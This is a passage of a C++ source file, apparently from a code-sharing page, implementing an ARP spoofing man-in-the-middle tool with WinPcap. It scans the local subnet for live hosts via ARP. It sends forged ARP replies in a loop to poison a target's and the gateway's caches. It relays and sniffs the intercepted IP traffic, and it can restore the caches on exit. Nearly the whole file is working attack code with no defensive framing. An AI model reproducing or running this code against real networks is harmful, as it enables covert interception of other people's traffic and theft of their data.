📄 arpsproof.cpp
字号:
u_char * pkt_data;
for(k=0;k<6;k++)
{
eth.eh_dst[k]=0xff;
eth.eh_src[k]=0x0f;
arp.arp_sha[k]=0x0f;
arp.arp_tha[k]=0x00;
}
eth.eh_type=htons(ETH_ARP);
arp.arp_hdr=htons(ARP_HARDWARE);
arp.arp_pro=htons(ETH_IP);
arp.arp_hln=6;
arp.arp_pln=4;
arp.arp_opt=htons(ARP_REQUEST);
arp.arp_tpa=myip->ip;
arp.arp_spa=inet_addr("127.0.0.2"); //随便设的请求方ip
memset(sendbuf,0,sizeof(sendbuf));
memcpy(sendbuf,ð,sizeof(eth));
memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));
if(pcap_sendpacket(slecadopt,sendbuf,42)==0)
{
printf("PacketSend succeed\n\n");
}
else
{
printf("PacketSendPacket in getmine Error: %d\n",GetLastError());
return 0;
}
while((k=pcap_next_ex(slecadopt,&pkt_header,(const u_char**)&pkt_data))>=0)
{
if(*(unsigned short *)(pkt_data+12)==htons(ETH_ARP)&&*(unsigned short*)(pkt_data+20)==htons(ARP_REPLY)&&*(unsigned long*)(pkt_data+38)==inet_addr("127.0.0.2"))
{
for(i=0;i<6;i++)
{
myip->mac[i]=*(unsigned char*)(pkt_data+22+i);
}
break;
}
}
if(i==6)
{
return 1;
}
else
{
return 0;
}
}
unsigned int _stdcall sendpackettogetallacttiveIpwithMac(void *x)
{
ULONG tip,subnetsta,subnetend;
unsigned char sendbuf[42];
int k;
ETHDR eth;
ARPHDR arp;
subnetsta=htonl(myip->ip&mynetmask); //计算内网ip起点
subnetend=htonl(htonl(subnetsta)|(~mynetmask)); //计算内网ip结束
for(k=0;k<6;k++)
{
eth.eh_dst[k]=0xff;
eth.eh_src[k]=myip->mac[k];
arp.arp_sha[k]=myip->mac[k];
arp.arp_tha[k]=0x00;
}
eth.eh_type=htons(ETH_ARP);
arp.arp_hdr=htons(ARP_HARDWARE);
arp.arp_pro=htons(ETH_IP);
arp.arp_hln=6;
arp.arp_pln=4;
arp.arp_opt=htons(ARP_REQUEST);
arp.arp_spa=myip->ip;
memset(sendbuf,0,sizeof(sendbuf));
memcpy(sendbuf,ð,sizeof(eth));
for(tip=subnetsta;tip<=subnetend;tip++)
{
arp.arp_tpa=htonl(tip);
memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));
if(pcap_sendpacket(slecadopt,sendbuf,42)!=0)
{
printf("Getallactive ip PacketSendPacket in getmine Error: %d\n",GetLastError());
return 0;
}
}
return 1;
}
unsigned int _stdcall recvpackettogetallacttiveIpwithMac(void *x)
{
struct pcap_pkthdr * pkt_header;
u_char * pkt_data;
PacttiveIpwithMac p,q;
int i;
while((pcap_next_ex(slecadopt,&pkt_header,(const u_char**)&pkt_data))>0)
{
if(*(unsigned short *)(pkt_data+12)==htons(ETH_ARP)&&*(unsigned short*)(pkt_data+20)==htons(ARP_REPLY)&&*(unsigned long*)(pkt_data+38)==myip->ip)
{
p=new acttiveIpwithMac;
p->next=NULL;
p->ip=*(unsigned long*)(pkt_data+28);
for(i=0;i<6;i++)
{
p->mac[i]=*(unsigned char*)(pkt_data+22+i);
}
if(Pipmachead==NULL)
{
Pipmachead=p;
q=p;
}
else
{
q->next=p;
q=p;
}
}
if(Ssendover==1)
{
return 1;
}
}
return 1;
}
unsigned int _stdcall transmitandsniffer(void *x)
{
struct changemac
{
unsigned char mac[12];
};
unsigned char bcast[6];
memset(bcast,0xff,sizeof(bcast));
unsigned char sendbuf[1600];
struct pcap_pkthdr * pkt_header;
u_char * pkt_data;
changemac *cmac,*togatewaymac;
PacttiveIpwithMac z;
int i,j;
cmac=new changemac;
togatewaymac=new changemac;
memcpy(togatewaymac->mac,gateip->mac,6);
memcpy(togatewaymac->mac+6,myip->mac,6);
//printf("1have run to here!!!\n");
while((j=pcap_next_ex(slecadopt,&pkt_header,(const u_char**)&pkt_data))>=0)
{
if(j==0)
{
//printf("2have run to here!!!\n");
continue;
}
if(*(unsigned short *)(pkt_data+12)==htons(ETH_IP)&&(!(memcmp(pkt_data+6,myip->mac,6)==0))&&*(unsigned long *)(pkt_data+30)!=myip->ip&&(!(memcmp(pkt_data,bcast,6)==0)))//(*(unsigned char*)(pkt_data+6)==myip->mac[0]&&*(unsigned char*)(pkt_data+7)==myip->mac[1]&&*(unsigned char*)(pkt_data+8)==myip->mac[2]&&*(unsigned char*)(pkt_data+9)==myip->mac[3]&&*(unsigned char*)(pkt_data+10)==myip->mac[4]&&*(unsigned char*)(pkt_data+11)==myip->mac[5])))
{
//if()//(!(*(unsigned char*)(pkt_data+0)==0xff&&*(unsigned char*)(pkt_data+1)==0xff&&*(unsigned char*)(pkt_data+2)==0xff&&*(unsigned char*)(pkt_data+3)==0xff&&*(unsigned char*)(pkt_data+4)==0xff&&*(unsigned char*)(pkt_data+5)==0xff))&&)
//{ //for(i=0;i<6;i++)
// printf("%02x:",*(unsigned char*)(pkt_data+i));
//printf("33have run to here!!!\n");
memcpy(sendbuf,pkt_data,pkt_header->caplen);
memcpy(sendbuf,togatewaymac,12);
for(z=Pipmachead;z!=NULL;z=z->next)
{//printf("444have run to here!!!\n");
if(*(unsigned long *)(pkt_data+30)==z->ip)
{
i=0;
//printf("jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjip=%s",iptos(z->ip));
//for(;i<6;i++)
//cmac->mac[i]=z->mac[i];
memcpy(cmac->mac,z->mac,6);
//for(;i<12;i++)
//cmac->mac[i]=myip->mac[i-6];
memcpy(cmac->mac+6,myip->mac,6);
//memset(sendbuf,0,sizeof(sendbuf));
memcpy(sendbuf,cmac,12);
/*if(*///!=0)
break;
//{
// printf("tansmit Error: %d\n",GetLastError());
// return 0;
// }
}
}
pcap_sendpacket(slecadopt,sendbuf,pkt_header->caplen);
//}//printf("getip:%s len:%d\n",iptos(*(unsigned long *)(pkt_data+30)),pkt_header->caplen);
}
}
return 1;
}
unsigned int _stdcall sproof(void *x)
{
int j,i=*(int*)x;
unsigned char sendbuftogate[42],sendbuftosp[42],rsendbuftogate[42],rsendbuftosp[42];
PacttiveIpwithMac spip;
ETHDR eth;
ARPHDR arp;
int k;
for(spip=Pipmachead,j=0;j<i-1;spip=spip->next,j++);
printf("%-3d ip=%-20s mac=%02x:%02x:%02x:%02x:%02x:%02x\n",i,iptos(spip->ip),spip->mac[0],spip->mac[1],spip->mac[2],spip->mac[3],spip->mac[4],spip->mac[5]);
for(k=0;k<6;k++)
{
eth.eh_dst[k]=gateip->mac[k];
eth.eh_src[k]=myip->mac[k];
arp.arp_sha[k]=myip->mac[k];
arp.arp_tha[k]=gateip->mac[k];
}
eth.eh_type=htons(ETH_ARP);
arp.arp_hdr=htons(ARP_HARDWARE);
arp.arp_pro=htons(ETH_IP);
arp.arp_hln=6;
arp.arp_pln=4;
arp.arp_opt=htons(ARP_REPLY);
arp.arp_spa=spip->ip;
arp.arp_tpa=gateip->ip;
memset(sendbuftogate,0,sizeof(sendbuftogate));
memcpy(sendbuftogate,ð,sizeof(eth));
memcpy(sendbuftogate+sizeof(eth),&arp,sizeof(arp));
for(k=0;k<6;k++)
{
eth.eh_dst[k]=spip->mac[k];
eth.eh_src[k]=myip->mac[k];
arp.arp_sha[k]=myip->mac[k];
arp.arp_tha[k]=spip->mac[k];
}
arp.arp_spa=gateip->ip;
arp.arp_tpa=spip->ip;
memset(sendbuftosp,0,sizeof(sendbuftosp));
memcpy(sendbuftosp,ð,sizeof(eth));
memcpy(sendbuftosp+sizeof(eth),&arp,sizeof(arp));
for(k=0;k<6;k++)
{
eth.eh_dst[k]=spip->mac[k];
eth.eh_src[k]=gateip->mac[k];
arp.arp_sha[k]=gateip->mac[k];
arp.arp_tha[k]=spip->mac[k];
}
arp.arp_spa=gateip->ip;
arp.arp_tpa=spip->ip;
memset(rsendbuftosp,0,sizeof(rsendbuftosp));
memcpy(rsendbuftosp,ð,sizeof(eth));
memcpy(rsendbuftosp+sizeof(eth),&arp,sizeof(arp));
for(k=0;k<6;k++)
{
eth.eh_dst[k]=gateip->mac[k];
eth.eh_src[k]=spip->mac[k];
arp.arp_sha[k]=spip->mac[k];
arp.arp_tha[k]=gateip->mac[k];
}
arp.arp_spa=spip->ip;
arp.arp_tpa=gateip->ip;
memset(rsendbuftogate,0,sizeof(rsendbuftogate));
memcpy(rsendbuftogate,ð,sizeof(eth));
memcpy(rsendbuftogate+sizeof(eth),&arp,sizeof(arp));
printf("已经进入%d号机的欺骗!!!\n",i);
while(TRUE)
{
if(pcap_sendpacket(slecadopt,sendbuftogate,42)!=0)
{
printf("sendbuftogate Error: %d\n",GetLastError());
return 0;
}
if(pcap_sendpacket(slecadopt,sendbuftosp,42)!=0)
{
printf("sendbuftosp Error: %d\n",GetLastError());
return 0;
}
Sleep(980);
if(cheat[i-1]==0) //重置被欺骗的目标机!!
{
for(j=10;j>0;j--)
{
if(pcap_sendpacket(slecadopt,rsendbuftogate,42)!=0)
{
printf("sendbuftogate Error: %d\n",GetLastError());
return 0;
}
if(pcap_sendpacket(slecadopt,rsendbuftosp,42)!=0)
{
printf("sendbuftosp Error: %d\n",GetLastError());
return 0;
}
}
printf("已经退出对%d号机的欺骗!!!\n",i);
return 1;
}
}
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -